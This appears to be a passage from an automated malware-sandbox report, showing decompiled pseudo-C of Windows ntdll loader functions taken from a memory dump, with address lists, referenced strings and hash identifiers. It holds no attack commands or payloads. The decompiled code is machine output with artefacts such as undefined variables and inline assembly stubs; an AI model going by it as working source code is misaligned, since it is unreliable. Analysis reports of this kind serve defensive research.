                                                        • Opcode Fuzzy Hash: 7b6ff4055a38f6bfa9c95e34f62c72524d7feede6cbd760777030bd2ed971447
                                                        • Instruction Fuzzy Hash: 9641F632E80319EFDB34BE588888A35B6A5EB4035AF068F7DE804D7591E774FC80C681
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E048A8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E048A934A() != 0) {
								_t159 = E0491A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4985780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04915510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4985780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E048A849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E048A8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E048A8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4985c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4985c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E048B2280(_t92, 0x49886cc);
															_t94 = E04969DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E048C61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4985c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E048A8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4985c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4985c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E048DF380(_t136, 0x4871184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E048B2280(_t108, 0x49886cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E048C61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04969D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E048AFFB0(_t118, _t156, 0x49886cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E048D9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                        0x048a8799
                                                        0x048a879d
                                                        0x048a87a1
                                                        0x048a87a3
                                                        0x048a87a8
                                                        0x048a87c3
                                                        0x048a87c3
                                                        0x048a87c8
                                                        0x048a87d1
                                                        0x048a87d4
                                                        0x048a87d8
                                                        0x048a87e5
                                                        0x048a87ec
                                                        0x048f9bfe
                                                        0x048f9c00
                                                        0x048f9c02
                                                        0x048f9c08
                                                        0x048f9c0d
                                                        0x048f9c0f
                                                        0x048f9c14
                                                        0x048f9c2d
                                                        0x048f9c32
                                                        0x048f9c37
                                                        0x048f9c3a
                                                        0x048f9c3c
                                                        0x048f9c42
                                                        0x048f9c42
                                                        0x048f9c3c
                                                        0x048f9c02
                                                        0x048a87da
                                                        0x048a87df
                                                        0x048a87e3
                                                        0x00000000
                                                        0x00000000
                                                        0x048a87e3
                                                        0x048a87f2
                                                        0x00000000
                                                        0x048a87fb
                                                        0x048a87fd
                                                        0x048a87fe
                                                        0x048a880e
                                                        0x048a880f
                                                        0x048a8810
                                                        0x048a8814
                                                        0x048a881a
                                                        0x048a881c
                                                        0x048a881f
                                                        0x048a8821
                                                        0x048a8822
                                                        0x048a8824
                                                        0x048a8826
                                                        0x048a882c
                                                        0x048a882e
                                                        0x048f9c48
                                                        0x048f9c48
                                                        0x048a8834
                                                        0x048a8834
                                                        0x048a8837
                                                        0x00000000
                                                        0x00000000
                                                        0x048a8837
                                                        0x048a882e
                                                        0x048a883d
                                                        0x048a8840
                                                        0x048a8843
                                                        0x048a8846
                                                        0x048a8849
                                                        0x048a884c
                                                        0x048a884e
                                                        0x048a8850
                                                        0x048a8852
                                                        0x048a8854
                                                        0x048a8857
                                                        0x048a88b4
                                                        0x048a88b6
                                                        0x048a88b6
                                                        0x048a8859
                                                        0x048a8859
                                                        0x048a8859
                                                        0x048a8861
                                                        0x048a8866
                                                        0x048a886a
                                                        0x048a893d
                                                        0x048a8941
                                                        0x00000000
                                                        0x048a8947
                                                        0x048a8947
                                                        0x048a894a
                                                        0x048a894c
                                                        0x00000000
                                                        0x048a8952
                                                        0x048a8955
                                                        0x048a895a
                                                        0x048a895d
                                                        0x048a895d
                                                        0x048a895f
                                                        0x048a8961
                                                        0x048a8961
                                                        0x048a8968
                                                        0x00000000
                                                        0x00000000
                                                        0x048a896a
                                                        0x048a896b
                                                        0x048a896e
                                                        0x00000000
                                                        0x048a8970
                                                        0x048a8970
                                                        0x048a8970
                                                        0x048a8970
                                                        0x048a8972
                                                        0x048a8972
                                                        0x048a8974
                                                        0x00000000
                                                        0x048a897a
                                                        0x048a897a
                                                        0x048a897d
                                                        0x00000000
                                                        0x048a8983
                                                        0x048f9c65
                                                        0x048f9c6d
                                                        0x048f9c72
                                                        0x048f9c75
                                                        0x048f9c75
                                                        0x048f9c82
                                                        0x048f9c86
                                                        0x048f9c87
                                                        0x048f9c88
                                                        0x048f9c89
                                                        0x048f9c8c
                                                        0x048f9c90
                                                        0x048f9c95
                                                        0x048f9c97
                                                        0x048f9ca0
                                                        0x048f9ca3
                                                        0x048f9ca9
                                                        0x048f9ca9
                                                        0x00000000
                                                        0x048f9ca9
                                                        0x048f9ca3
                                                        0x00000000
                                                        0x048f9c97
                                                        0x048a897d
                                                        0x00000000
                                                        0x048a8974
                                                        0x048a8988
                                                        0x048a8992
                                                        0x048a8996
                                                        0x00000000
                                                        0x048a8996
                                                        0x048a894c
                                                        0x00000000
                                                        0x048a8870
                                                        0x048a887b
                                                        0x048a887d
                                                        0x048a887f
                                                        0x048a8881
                                                        0x048a8884
                                                        0x048a8884
                                                        0x048a8886
                                                        0x048a8889
                                                        0x048a888c
                                                        0x048a888e
                                                        0x048a8891
                                                        0x048a8891
                                                        0x048a8898
                                                        0x00000000
                                                        0x00000000
                                                        0x048a889a
                                                        0x048a889b
                                                        0x048a889e
                                                        0x00000000
                                                        0x00000000
                                                        0x048a88a0
                                                        0x048a88a8
                                                        0x048a88b0
                                                        0x048a88b2
                                                        0x048a88d3
                                                        0x048a88d5
                                                        0x00000000
                                                        0x048a88d7
                                                        0x048a88db
                                                        0x048a88dc
                                                        0x048a88e0
                                                        0x048a88e8
                                                        0x048a88ee
                                                        0x048a88f0
                                                        0x048a88f3
                                                        0x048a88fc
                                                        0x048a8901
                                                        0x048a8906
                                                        0x048a890c
                                                        0x048a890c
                                                        0x048a890f
                                                        0x048a8916
                                                        0x048a8917
                                                        0x048a8918
                                                        0x048a8919
                                                        0x048a891a
                                                        0x048a891f
                                                        0x048a8921
                                                        0x048f9c52
                                                        0x048f9c55
                                                        0x048f9c5b
                                                        0x048f9cac
                                                        0x048f9cc0
                                                        0x048f9cc0
                                                        0x048f9c55
                                                        0x048a8927
                                                        0x048a8927
                                                        0x048a892f
                                                        0x048a8933
                                                        0x00000000
                                                        0x048a88f5
                                                        0x048a88f5
                                                        0x00000000
                                                        0x048a88f7
                                                        0x048a88f7
                                                        0x048a88fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048a88fa
                                                        0x048a88f5
                                                        0x048a88f3
                                                        0x00000000
                                                        0x048a88d5
                                                        0x00000000
                                                        0x048a88b2
                                                        0x048a88c9
                                                        0x00000000
                                                        0x048a88c9
                                                        0x048a887f
                                                        0x048a886a
                                                        0x048a8857
                                                        0x048a8852
                                                        0x048a88bf
                                                        0x048a88bf
                                                        0x048a87aa
                                                        0x048a87ad
                                                        0x048a87ae
                                                        0x048a87b4
                                                        0x048a87b5
                                                        0x048a87b6
                                                        0x048a87b8
                                                        0x048a87bd
                                                        0x048a87c1
                                                        0x048a87f4
                                                        0x048a87fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048a87c1
                                                        0x00000000

                                                        Strings
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 048F9C28
                                                        • LdrpDoPostSnapWork, xrefs: 048F9C1E
                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 048F9C18
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 0-1948996284
                                                        • Opcode ID: ebcc9cd7808d1a42196496d0e11c7f313bcc4d0ea10725415ab1cb6cbe2bf752
                                                        • Instruction ID: f0763479461c27c3db53e907ea7fad6161c3eec2236df4c0ba9a1991a89a48ea
                                                        • Opcode Fuzzy Hash: ebcc9cd7808d1a42196496d0e11c7f313bcc4d0ea10725415ab1cb6cbe2bf752
                                                        • Instruction Fuzzy Hash: 0C911671A00219DFFB18EF59C880A7AB7B5FF44354B054A69D905EB240EBB0FD21DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E048A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E048ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0489C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4985780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04915510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4985780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E048B7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E048B7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04917016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E048B7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E048B7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04917016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E048CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0489B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                        0x048a7e4c
                                                        0x048a7e50
                                                        0x048a7e55
                                                        0x048a7e58
                                                        0x048a7e5d
                                                        0x048a7e71
                                                        0x048a7f33
                                                        0x048a7e77
                                                        0x048a7e77
                                                        0x048a7e79
                                                        0x048a7e79
                                                        0x048a7e7e
                                                        0x048a7f45
                                                        0x048f9848
                                                        0x00000000
                                                        0x048f9848
                                                        0x048a7f4e
                                                        0x048a7f53
                                                        0x048a7f5a
                                                        0x00000000
                                                        0x00000000
                                                        0x048f985a
                                                        0x048f9862
                                                        0x048f9866
                                                        0x00000000
                                                        0x048f986c
                                                        0x00000000
                                                        0x048f986c
                                                        0x048a7e84
                                                        0x048a7e84
                                                        0x048a7e8d
                                                        0x048f9871
                                                        0x048a7eb8
                                                        0x048a7ec0
                                                        0x048a7ec0
                                                        0x048a7e9a
                                                        0x048f987e
                                                        0x00000000
                                                        0x00000000
                                                        0x048f9884
                                                        0x048f988b
                                                        0x048f98a7
                                                        0x048f98ac
                                                        0x048f98b1
                                                        0x048f98b6
                                                        0x048f98b8
                                                        0x048f98b8
                                                        0x048f98b9
                                                        0x00000000
                                                        0x048f98b9
                                                        0x048a7ea0
                                                        0x048a7ea7
                                                        0x00000000
                                                        0x00000000
                                                        0x048a7eac
                                                        0x048a7eb1
                                                        0x048a7ec6
                                                        0x048a7ed0
                                                        0x048f98cc
                                                        0x048a7ed6
                                                        0x048a7ed6
                                                        0x048a7ed6
                                                        0x048a7ede
                                                        0x048a7ee3
                                                        0x048f98e3
                                                        0x048f98f0
                                                        0x048f9902
                                                        0x048f98f2
                                                        0x048f98fb
                                                        0x048f98fb
                                                        0x048f9907
                                                        0x048f991d
                                                        0x048f991d
                                                        0x048f9907
                                                        0x048f98e3
                                                        0x048a7ef0
                                                        0x048a7f14
                                                        0x048a7f14
                                                        0x048a7f1e
                                                        0x048f9946
                                                        0x048a7f24
                                                        0x048a7f24
                                                        0x048a7f24
                                                        0x048a7f2c
                                                        0x048f996a
                                                        0x048f9975
                                                        0x048f9975
                                                        0x048f997e
                                                        0x048f9993
                                                        0x048f9993
                                                        0x048f997e
                                                        0x00000000
                                                        0x048a7ef2
                                                        0x048a7efc
                                                        0x048a7f0a
                                                        0x048a7f0e
                                                        0x048f9933
                                                        0x00000000
                                                        0x048f9933
                                                        0x00000000
                                                        0x048a7f0e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048a7eb1

                                                        Strings
                                                        • minkernel\ntdll\ldrmap.c, xrefs: 048F98A2
                                                        • LdrpCompleteMapModule, xrefs: 048F9898
                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 048F9891
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                        • API String ID: 0-1676968949
                                                        • Opcode ID: 17be612bc63a091387fdd11b7272d16a3108d0b44587964af414d6e88ef61a80
                                                        • Instruction ID: 7e9ecbd5d85e9a6166f112d227e7613991bb14006033669649dabe9fe8b3ed3f
                                                        • Opcode Fuzzy Hash: 17be612bc63a091387fdd11b7272d16a3108d0b44587964af414d6e88ef61a80
                                                        • Instruction Fuzzy Hash: 7F51E171B007849BE721CA68C844B26B7E4AB40718F440FA9EA51DB791D7B4FD20EB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E0489E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0489F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E048D95D0();
						}
						if(_t78 != 0) {
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E048DFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E048DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E048D9600();
					if(_t97 < 0) {
						goto L6;
					}
					E048DBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0489F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E048DBB40(_t83, _t102 + 0x24, _t78);
								if(L048A43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E048DBB40(_t84, _t102 + 0x24, _t94);
									if(L048A43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                        0x0489e620
                                                        0x0489e628
                                                        0x0489e62f
                                                        0x0489e631
                                                        0x0489e635
                                                        0x0489e637
                                                        0x0489e63e
                                                        0x048f5503
                                                        0x048f5503
                                                        0x0489e64c
                                                        0x0489e64c
                                                        0x0489e651
                                                        0x00000000
                                                        0x00000000
                                                        0x0489e661
                                                        0x0489e665
                                                        0x048f542a
                                                        0x0489e715
                                                        0x0489e71a
                                                        0x0489e71c
                                                        0x0489e720
                                                        0x0489e720
                                                        0x0489e727
                                                        0x0489e736
                                                        0x0489e736
                                                        0x0489e743
                                                        0x0489e743
                                                        0x0489e673
                                                        0x0489e678
                                                        0x0489e67d
                                                        0x0489e682
                                                        0x0489e685
                                                        0x0489e692
                                                        0x0489e69b
                                                        0x0489e6a3
                                                        0x0489e6ad
                                                        0x0489e6b1
                                                        0x0489e6b2
                                                        0x0489e6bb
                                                        0x0489e6bf
                                                        0x0489e6c0
                                                        0x0489e6c8
                                                        0x0489e6cc
                                                        0x0489e6d5
                                                        0x0489e6d9
                                                        0x00000000
                                                        0x00000000
                                                        0x0489e6e5
                                                        0x0489e6ea
                                                        0x0489e6f9
                                                        0x0489e70b
                                                        0x0489e70f
                                                        0x048f5439
                                                        0x048f545e
                                                        0x048f545e
                                                        0x00000000
                                                        0x048f545e
                                                        0x048f543b
                                                        0x048f543e
                                                        0x048f5440
                                                        0x048f5445
                                                        0x048f5472
                                                        0x048f5475
                                                        0x048f548d
                                                        0x048f5493
                                                        0x048f54a9
                                                        0x00000000
                                                        0x00000000
                                                        0x048f54ab
                                                        0x048f54b4
                                                        0x048f54bc
                                                        0x048f54c8
                                                        0x048f54de
                                                        0x048f54fb
                                                        0x048f54e0
                                                        0x048f54e6
                                                        0x048f54eb
                                                        0x048f54eb
                                                        0x048f54de
                                                        0x00000000
                                                        0x048f54bc
                                                        0x048f5477
                                                        0x048f547a
                                                        0x048f5480
                                                        0x048f5483
                                                        0x048f5486
                                                        0x048f548b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048f548b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048f5447
                                                        0x048f5447
                                                        0x048f5447
                                                        0x048f5447
                                                        0x048f544e
                                                        0x00000000
                                                        0x00000000
                                                        0x048f5450
                                                        0x048f5452
                                                        0x048f5455
                                                        0x048f545a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048f545c
                                                        0x048f546a
                                                        0x048f546d
                                                        0x048f546f
                                                        0x00000000
                                                        0x048f546f
                                                        0x0489e70f

                                                        Strings
                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0489E68C
                                                        • @, xrefs: 0489E6C0
                                                        • InstallLanguageFallback, xrefs: 0489E6DB
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                        • API String ID: 0-1757540487
                                                        • Opcode ID: d34b6704b6837455361e11c8e8c58d28033a21f8b3ebd0d4648f714bd40480cb
                                                        • Instruction ID: e9b3491d21e7f50e4817f8396f9a3c01dd83313568d71735fa9d2b73ff6d6844
